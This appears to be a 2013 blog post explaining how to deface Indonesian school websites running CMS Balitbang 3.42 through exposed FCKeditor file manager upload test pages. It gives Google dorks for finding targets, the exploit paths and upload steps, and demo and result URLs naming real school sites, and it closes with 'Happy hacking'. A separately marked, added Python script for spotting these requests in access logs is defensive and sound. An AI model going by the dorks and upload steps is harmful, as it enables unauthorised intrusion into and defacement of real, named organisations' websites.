Wednesday, 17 April 2013

CMS Balitbang 3.42 [ DEFACING WEBSITES ON SCH.ID DOMAINS ]


Dork :

inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
Exploit : 
http://public_html/dir/editor/filemanager/connectors/uploadtest.html
http://public_html/dir/editor/filemanager/connectors/test.html
http://public_html/dir/editor/filemanager/browser/default/browser.html

Pick one of them. Once the page opens, switch the connector from ASP --> PHP, then upload your file, but it has to be a .TXT file.

Demo:
http://www.sman1kotabaru.sch.id/editor/filemanager/connectors/uploadtest.html
http://www.smppd1bpp.com/editor/filemanager/connectors/uploadtest.html
http://smp1kudus.sch.id/editor/filemanager/connectors/uploadtest.html

Result:
http://www.sman1kotabaru.sch.id/userfiles/RSsite.txt
http://www.smppd1bpp.com/userfiles/RSsite.txt
http://smp1kudus.sch.id/userfiles/RSsite.txt 
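
From the site owner's side, the requests described above leave a recognizable trace in the web server's access log. The following is an added example, not part of the original post: it flags requests to the three file manager pages listed under Exploit and any later fetch from /userfiles/ by the same client. The log format (Common Log Format), the sample lines, the IP addresses and the file names are constructed assumptions.

```python
import re

# Pages listed under "Exploit" in the post (matched anywhere in the request path).
TEST_PAGE = re.compile(
    r"/editor/filemanager/(?:connectors/(?:uploadtest|test)\.html"
    r"|browser/default/browser\.html)", re.I)
# Upload directory seen in the post's "Result" URLs.
UPLOADED = re.compile(r"/userfiles/[^?\s]+", re.I)
# Assumed log format: Common Log Format (client, request line, status code).
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

def triage(lines):
    """Return (exposed_pages, findings) for an iterable of access-log lines."""
    exposed = set()    # test pages the server actually served (status 200)
    probed = set()     # clients that requested any of the test pages
    findings = []      # (client, severity, detail) in log order
    for raw in lines:
        m = LINE.match(raw)
        if not m:
            continue   # skip lines that are not in the assumed format
        client, _method, path, status = m.groups()
        page = TEST_PAGE.search(path)
        if page:
            probed.add(client)
            if status == "200":
                exposed.add(page.group(0).lower())
                findings.append((client, "high", "test page served: " + path))
            else:
                findings.append((client, "low", "probe rejected: " + path))
        elif UPLOADED.search(path) and status == "200" and client in probed:
            # Same client opened a test page earlier, then fetched an uploaded file.
            findings.append((client, "critical", "fetched upload after probe: " + path))
    return exposed, findings

# Constructed sample log: documentation IP ranges and made-up file names.
SAMPLE = [
    '198.51.100.7 - - [17/Apr/2013:10:01:02 +0700] "GET /editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 4312',
    '198.51.100.7 - - [17/Apr/2013:10:02:40 +0700] "GET /userfiles/sample.txt HTTP/1.1" 200 57',
    '203.0.113.9 - - [17/Apr/2013:10:05:11 +0700] "GET /editor/filemanager/connectors/test.html HTTP/1.1" 404 210',
    '192.0.2.44 - - [17/Apr/2013:10:06:00 +0700] "GET /userfiles/logo.png HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    exposed_pages, results = triage(SAMPLE)
    print("exposed:", sorted(exposed_pages))
    for finding in results:
        print(finding)
```

A `high` finding means the editor's test pages are still reachable on the site and should be removed or access-restricted, together with the file manager connectors behind them.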

Happy hacking :D
